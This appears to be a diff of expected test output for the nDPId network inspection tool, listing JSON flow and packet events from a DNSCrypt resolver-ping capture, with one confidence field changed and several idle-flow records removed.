00603{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":593,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":238,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739617004,"flow_last_seen":946739617004,"flow_idle_time":200000,"flow_min_l4_payload_len":576,"flow_max_l4_payload_len":576,"flow_tot_l4_payload_len":576,"flow_avg_l4_payload_len":576,"midstream":0,"thread_ts_msec":946739617004,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"144.91.106.227","src_port":50443,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 
01238{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":593,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":238,"flow_packet_id":1,"flow_last_seen":946739617004,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":618,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":618,"pkt_l4_len":584,"thread_ts_msec":946739617004,"pkt":"REREREREZmZmZmZmCABFAAJc+TpAAKYRHVsKAAABkFtq48ULAbsCSL5UGz3LRoQYGq7K1L0mf5PIChUIPitfU3P1xdue2oSi59s41xANmFlcDMYv6lXLSTAmrdvTCyOYpoj3kt1OReSCqSRptuX3NltyQeLyb5cvSCa8IppjLkWscLpkUyp0EuX0uRM80Z0tP4bkozd9zL82wWjC8W8tmOO4RTgddRqe2OW6UcaHGdoyLPby7WVQbLUZtFO6cYUzbEsqfBQPgCTh\/qKzkBHUUFOcOzpUyI3MqJzYO0+HYvDMlUyYOn02yFtLLa5Pq1FzqbW8q5lSsV54O2im5U817KNJVnj\/1Ex0RZMgloFaQtGlXZoAu0SSgUwvvAL1FO1uoRRAx+AcSeEgZ9dYJhUksMKZOl0pd1gb1y8kNBpupQux9D3tnmm7KlCbGQCOdJ7gfT1HbeHBBq0E1\/iBd8zqzehjb3a24okMSsxmhLmPfcn4P9uZtYdGDWmUahJxq\/ugthfP8l7FCJb27pTFxpBGhYYKBpCs8n66CHCXntWVKyqe9MG6tK4sOASpV12JTr1YNDUpJbbagNSSVC5+IbRWJ9kB5Tr1rdpADAHtTZhkSuXY7lHM\/VYuUqKr1+qXLnLCAo5cFYbfySTD\/RlMa1jGWX7ZjRRid5DRXgauaKlqQZ3kXMkfTFpvDON8m0NTWj9A1FG\/47eQpOKy5YSZ3VSyyGdtTjV5AwxRf0u5j7LIlgeShVaNcOEV16mq+tTopZDdjg\/q8bR3f8vgTH0VjGrhrUoHlYjd9nR+n\/OCx\/s7syonVC6jt\/ML6xGu"} 
00786{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":594,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":238,"flow_packet_id":2,"flow_last_seen":946739617027,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":282,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":282,"pkt_l4_len":248,"thread_ts_msec":946739617027,"pkt":"ZmZmZmZmRERERERECABFAAEMVhtAADcRMMuQW2rjCgAAAQG7xQsA+AQwcjZmbnZXajjGL+pVy0kwJq3b0ws3QQmU1oaTmLs\/KBJiu7G8scEX3PGgxPg+ruVnqVNFUraQxsErWYtLItB90wPdHcXiqlBhJWtFp4LLnWAvhKLKhjFEw\/atFhZeDiqXStF1L94cSN904FNHbkEph9CBTREE+edOKfiP4WqHgqjHUNPQp7n\/XDg\/V39BVU7YZKgJKtX72jHsW8p+y1tD4\/oB5Dnpf9M\/FhDm1mUKnuHl2H9\/fkExtOnA6OjnoUWzl+W3CX4dYlGVJl9MVrQvZzZFoWkXil+wG5XW3z1KVD3tlSpd4VUIxP+btk8gcC+s"} -00660{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":594,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":238,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":946739617004,"flow_last_seen":946739617027,"flow_idle_time":200000,"flow_min_l4_payload_len":240,"flow_max_l4_payload_len":576,"flow_tot_l4_payload_len":816,"flow_avg_l4_payload_len":408,"midstream":0,"thread_ts_msec":946739617027,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"144.91.106.227","src_port":50443,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} 
+00660{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":594,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":238,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":946739617004,"flow_last_seen":946739617027,"flow_idle_time":200000,"flow_min_l4_payload_len":240,"flow_max_l4_payload_len":576,"flow_tot_l4_payload_len":816,"flow_avg_l4_payload_len":408,"midstream":0,"thread_ts_msec":946739617027,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"144.91.106.227","src_port":50443,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} 00603{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":595,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":239,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739620053,"flow_last_seen":946739620053,"flow_idle_time":200000,"flow_min_l4_payload_len":576,"flow_max_l4_payload_len":576,"flow_tot_l4_payload_len":576,"flow_avg_l4_payload_len":576,"midstream":0,"thread_ts_msec":946739620053,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"144.91.106.227","src_port":37711,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 
01236{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":595,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":239,"flow_packet_id":1,"flow_last_seen":946739620053,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":618,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":618,"pkt_l4_len":584,"thread_ts_msec":946739620053,"pkt":"REREREREZmZmZmZmCABFAAJc+yVAAKYRG3AKAAABkFtq45NPAbsCSL5UGz3LRoQYGq7K1L0mf5PIChUIPitfU3P1xdue2oSi59s41xANmFlcDJIKeRwV+B3o\/S1Vi20pwQIdLtPPzfiWHWJQqFzxTOLyCv2P6iXlQZj5XjV3kgHWrJU4+x22jVmI8HXUQsL4Ett9CycuHxHxWcs\/QYSIRhXy4zBDqi\/TRLgCDvexnLEbWrLVqZlx1oiHSo5WUfrBG87Hnp2cAe\/gsf5JPymP1MD3qdNPqZTHuk8S3o2b7BAHlFbKntVCDBSVQ2u7L9Ln\/6QrREPkeEFI1x9w5DZ5HrdTDgz+nlHzDSJBD364iAl3eoetv8rISqtBsiSLQHroHpiaUZtlR34l9Vzjmefx2nlmLBPG9TXLLZ\/mrHRFJkh\/uUcYYlECvdkuHlyfOYBwWiwoiqEQ+llPw\/pJiTU8CEAtaLv6CbONOtgp6JdiKE6d43D6uaZcFnqBbwg9eaCGVpcGiuUf8O0AgPu2sDwbVkeFGCSP+1RYWtMKN4UHnlXAzPp5xMNSLWhVnOiQOltHL0A4mIocw8NAKgYgB5WImGwHYZJTu3vKHL1ma4UUJgC2aPqavoEA8xSewTk8+kcdCu+H7U80l6uImg5OwmEHjnULbQ0NG6WqqnmnPPxiAFv0OcQF6VQejNwyFXYLHhqFbcBYdLiQUtlr\/CQbqH4bkFMHbjKfSQ5+8dmJhmOjdlgfwyZVo9qRa+DzThEZzNmUms2ITRpkxyxskJfLxizZZ7rIR6efqljBrZaiXsrJyXuIjgdlqkXHyYFN"} 00700{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":596,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":239,"flow_packet_id":2,"flow_last_seen":946739620112,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":218,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":218,"pkt_l4_len":184,"thread_ts_msec":946739620112,"pkt":"ZmZmZmZmRERERERECABFAADMWFtAADcRLsuQW2rjCgAAAQG7k08AuMXMcjZmbnZXajiSCnkcFfgd6P0tVYuPcDHPBNH+Q2V36ecIOy5+Vn6hASP7zwS+HB7\/COLeZpsYSR\/D4KtiLxFMLHMCSd4CEFa3HkazvGkn1cTMf7cEedRa5ffS2XboBOubQlEIegWZ\/uOw8cxjcAsifupeBdcSOB0uu0iqAXb97mPtwXo9C5m\/fEJEqoOJOH7mervMe4nPhBoqZk\/lTKOfh1zHYDnQCY0xNdH9fhG+JJ4="} 
-00660{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":596,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":239,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":946739620053,"flow_last_seen":946739620112,"flow_idle_time":200000,"flow_min_l4_payload_len":176,"flow_max_l4_payload_len":576,"flow_tot_l4_payload_len":752,"flow_avg_l4_payload_len":376,"midstream":0,"thread_ts_msec":946739620112,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"144.91.106.227","src_port":37711,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} -00700{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":597,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":159,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":946739337078,"flow_last_seen":946739337184,"flow_idle_time":200000,"flow_min_l4_payload_len":184,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":696,"flow_avg_l4_payload_len":348,"midstream":0,"thread_ts_msec":946739620112,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"167.114.220.125","src_port":39816,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} -00697{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":597,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":51,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":946739305192,"flow_last_seen":946739305214,"flow_idle_time":200000,"flow_min_l4_payload_len":180,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":692,"flow_avg_l4_payload_len":346,"midstream":0,"thread_ts_msec":946739620112,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"195.30.94.28","src_port":34885,"dst_port":8443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": 
{"confidence": {"4":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} -00700{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":597,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":232,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":946739402188,"flow_last_seen":946739402354,"flow_idle_time":200000,"flow_min_l4_payload_len":184,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1656,"flow_avg_l4_payload_len":828,"midstream":0,"thread_ts_msec":946739620112,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"23.111.74.205","src_port":53045,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} -00698{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":597,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":175,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":946739348805,"flow_last_seen":946739348917,"flow_idle_time":200000,"flow_min_l4_payload_len":186,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":698,"flow_avg_l4_payload_len":349,"midstream":0,"thread_ts_msec":946739620112,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"142.4.204.111","src_port":51647,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} 
-00700{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":597,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":47,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":946739305155,"flow_last_seen":946739305192,"flow_idle_time":200000,"flow_min_l4_payload_len":182,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1654,"flow_avg_l4_payload_len":827,"midstream":0,"thread_ts_msec":946739620112,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"139.59.200.116","src_port":37595,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} -00700{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":597,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":96,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":946739312132,"flow_last_seen":946739312183,"flow_idle_time":200000,"flow_min_l4_payload_len":186,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1658,"flow_avg_l4_payload_len":829,"midstream":0,"thread_ts_msec":946739620112,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"45.153.187.96","src_port":40451,"dst_port":4343,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} 
-00697{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":597,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":40,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":946739304789,"flow_last_seen":946739304821,"flow_idle_time":200000,"flow_min_l4_payload_len":183,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":695,"flow_avg_l4_payload_len":347,"midstream":0,"thread_ts_msec":946739620112,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"51.15.122.250","src_port":36668,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} -00701{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":597,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":123,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":946739317462,"flow_last_seen":946739317493,"flow_idle_time":200000,"flow_min_l4_payload_len":184,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":696,"flow_avg_l4_payload_len":348,"midstream":0,"thread_ts_msec":946739620112,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"178.216.201.222","src_port":53117,"dst_port":2053,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} 
-00697{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":597,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":58,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":946739305219,"flow_last_seen":946739305329,"flow_idle_time":200000,"flow_min_l4_payload_len":186,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":698,"flow_avg_l4_payload_len":349,"midstream":0,"thread_ts_msec":946739620112,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"142.4.204.111","src_port":43505,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} -00702{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":597,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":168,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":946739337184,"flow_last_seen":946739337184,"flow_idle_time":200000,"flow_min_l4_payload_len":1472,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1472,"flow_avg_l4_payload_len":1472,"midstream":0,"thread_ts_msec":946739620112,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"5.189.170.196","src_port":59749,"dst_port":465,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} 
-00697{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":597,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":224,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":946739400522,"flow_last_seen":946739400550,"flow_idle_time":200000,"flow_min_l4_payload_len":192,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":704,"flow_avg_l4_payload_len":352,"midstream":0,"thread_ts_msec":946739620112,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"77.66.84.233","src_port":46140,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} -00697{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":597,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":4,"flow_first_seen":946735705348,"flow_last_seen":946739305453,"flow_idle_time":200000,"flow_min_l4_payload_len":184,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":1392,"flow_avg_l4_payload_len":348,"midstream":0,"thread_ts_msec":946739620112,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"149.56.228.45","src_port":38388,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} 
-00699{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":597,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":100,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":946739312286,"flow_last_seen":946739312406,"flow_idle_time":200000,"flow_min_l4_payload_len":184,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1656,"flow_avg_l4_payload_len":828,"midstream":0,"thread_ts_msec":946739620112,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"66.85.30.115","src_port":47432,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} -00700{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":597,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":180,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":946739348805,"flow_last_seen":946739348917,"flow_idle_time":200000,"flow_min_l4_payload_len":186,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1658,"flow_avg_l4_payload_len":829,"midstream":0,"thread_ts_msec":946739620112,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"142.4.204.111","src_port":47621,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} 
-00702{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":597,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":221,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":946739400460,"flow_last_seen":946739400522,"flow_idle_time":200000,"flow_min_l4_payload_len":180,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1652,"flow_avg_l4_payload_len":826,"midstream":0,"thread_ts_msec":946739620112,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"185.193.127.244","src_port":46314,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} -00701{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":597,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":15,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":946739304328,"flow_last_seen":946739304362,"flow_idle_time":200000,"flow_min_l4_payload_len":186,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1658,"flow_avg_l4_payload_len":829,"midstream":0,"thread_ts_msec":946739620112,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"185.134.196.55","src_port":35005,"dst_port":8443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} 
-00700{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":597,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":110,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":946739317403,"flow_last_seen":946739317431,"flow_idle_time":200000,"flow_min_l4_payload_len":187,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1659,"flow_avg_l4_payload_len":829,"midstream":0,"thread_ts_msec":946739620112,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"51.158.166.97","src_port":47257,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} -00697{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":597,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":85,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":946739312105,"flow_last_seen":946739312130,"flow_idle_time":200000,"flow_min_l4_payload_len":189,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1661,"flow_avg_l4_payload_len":830,"midstream":0,"thread_ts_msec":946739620112,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"51.15.62.65","src_port":38812,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} 
-00698{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":597,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":211,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":946739396111,"flow_last_seen":946739396210,"flow_idle_time":200000,"flow_min_l4_payload_len":192,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":704,"flow_avg_l4_payload_len":352,"midstream":0,"thread_ts_msec":946739620112,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"107.170.57.34","src_port":54375,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} -00699{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":597,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":208,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":946739396070,"flow_last_seen":946739396108,"flow_idle_time":200000,"flow_min_l4_payload_len":186,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":698,"flow_avg_l4_payload_len":349,"midstream":0,"thread_ts_msec":946739620112,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"46.227.200.55","src_port":50277,"dst_port":8443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} 
-00698{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":597,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":109,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":946739317403,"flow_last_seen":946739317428,"flow_idle_time":200000,"flow_min_l4_payload_len":187,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":699,"flow_avg_l4_payload_len":349,"midstream":0,"thread_ts_msec":946739620112,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"51.158.166.97","src_port":37035,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} -00701{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":597,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":209,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":946739396070,"flow_last_seen":946739396110,"flow_idle_time":200000,"flow_min_l4_payload_len":186,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1658,"flow_avg_l4_payload_len":829,"midstream":0,"thread_ts_msec":946739620112,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"46.227.200.55","src_port":44161,"dst_port":8443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} 
-00698{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":597,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":138,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":946739318038,"flow_last_seen":946739318062,"flow_idle_time":200000,"flow_min_l4_payload_len":187,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":699,"flow_avg_l4_payload_len":349,"midstream":0,"thread_ts_msec":946739620112,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"151.80.222.79","src_port":38511,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} -00699{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":597,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":38,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":946739304789,"flow_last_seen":946739304818,"flow_idle_time":200000,"flow_min_l4_payload_len":183,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1655,"flow_avg_l4_payload_len":827,"midstream":0,"thread_ts_msec":946739620112,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"51.15.122.250","src_port":38867,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} 
-00699{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":597,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":191,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":946739380984,"flow_last_seen":946739381021,"flow_idle_time":200000,"flow_min_l4_payload_len":179,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1651,"flow_avg_l4_payload_len":825,"midstream":0,"thread_ts_msec":946739620112,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"85.5.93.230","src_port":51826,"dst_port":8443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} -00700{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":597,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":216,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":946739396111,"flow_last_seen":946739396218,"flow_idle_time":200000,"flow_min_l4_payload_len":192,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1664,"flow_avg_l4_payload_len":832,"midstream":0,"thread_ts_msec":946739620112,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"107.170.57.34","src_port":42141,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} 
